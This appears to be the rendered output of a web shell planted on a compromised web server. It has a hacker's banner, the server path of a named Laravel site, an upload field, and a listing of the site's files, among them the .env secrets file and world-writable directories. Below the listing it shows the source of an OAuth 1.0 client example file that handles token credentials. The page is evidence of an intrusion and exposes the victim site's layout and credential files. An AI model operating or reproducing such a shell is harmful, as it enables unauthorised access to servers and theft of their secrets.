I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

'your-identifier', 'secret' => 'your-secret', 'callback_uri' => "http://your-callback-uri/", )); // Start session session_start(); // Step 4 if (isset($_GET['user'])) { // Check somebody hasn't manually entered this URL in, // by checking that we have the token credentials in // the session. if ( ! isset($_SESSION['token_credentials'])) { echo 'No token credentials.'; exit(1); } // Retrieve our token credentials. From here, it's play time! $tokenCredentials = unserialize($_SESSION['token_credentials']); // // Below is an example of retrieving the identifier & secret // // (formally known as access token key & secret in earlier // // OAuth 1.0 specs). // $identifier = $tokenCredentials->getIdentifier(); // $secret = $tokenCredentials->getSecret(); // Some OAuth clients try to act as an API wrapper for // the server and it's API. We don't. This is what you // get - the ability to access basic information. If // you want to get fancy, you should be grabbing a // package for interacting with the APIs, by using // the identifier & secret that this package was // designed to retrieve for you. But, for fun, // here's basic user information. $user = $server->getUserDetails($tokenCredentials); var_dump($user); // Step 3 } elseif (isset($_GET['oauth_token']) && isset($_GET['oauth_verifier'])) { // Retrieve the temporary credentials from step 2 $temporaryCredentials = unserialize($_SESSION['temporary_credentials']); // Third and final part to OAuth 1.0 authentication is to retrieve token // credentials (formally known as access tokens in earlier OAuth 1.0 // specs). $tokenCredentials = $server->getTokenCredentials($temporaryCredentials, $_GET['oauth_token'], $_GET['oauth_verifier']); // Now, we'll store the token credentials and discard the temporary // ones - they're irrelevant at this stage. unset($_SESSION['temporary_credentials']); $_SESSION['token_credentials'] = serialize($tokenCredentials); session_write_close(); // Redirect to the user page header("Location: http://{$_SERVER['HTTP_HOST']}/?user=user"); exit; // Step 2 } elseif (isset($_GET['go'])) { // First part of OAuth 1.0 authentication is retrieving temporary credentials. // These identify you as a client to the server. $temporaryCredentials = $server->getTemporaryCredentials(); // Store the credentials in the session. $_SESSION['temporary_credentials'] = serialize($temporaryCredentials); session_write_close(); // Second part of OAuth 1.0 authentication is to redirect the // resource owner to the login screen on the server. $server->authorize($temporaryCredentials); // Step 1 } else { // Display link to start process echo 'Login'; }